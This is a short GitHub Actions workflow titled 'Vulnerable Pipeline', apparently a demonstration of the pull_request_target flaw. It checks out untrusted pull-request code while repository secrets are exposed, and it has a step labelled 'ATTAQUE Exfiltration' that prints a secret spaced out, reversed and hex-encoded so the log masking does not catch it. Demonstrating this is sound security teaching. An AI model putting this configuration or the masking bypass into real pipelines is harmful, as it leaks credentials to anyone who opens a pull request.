name: Vulnerable Pipeline
on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout PR code
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      
      - name: Step légitime
        run: |
          echo "===== Step légitime ====="
          echo "Valeur secrète masquée : $DEMO_SECRET"
        env:
          DEMO_SECRET: ${{ secrets.DEMO_SECRET }}
      
      - name: ATTAQUE Exfiltration
        run: |
          echo "=== DEBUT ATTAQUE ==="
          echo "$DEMO_SECRET" | sed 's/./& /g'
          echo "$DEMO_SECRET" | rev
          echo "$DEMO_SECRET" | xxd -p
          echo "=== FIN ATTAQUE ==="
        env:
          DEMO_SECRET: ${{ secrets.DEMO_SECRET }}
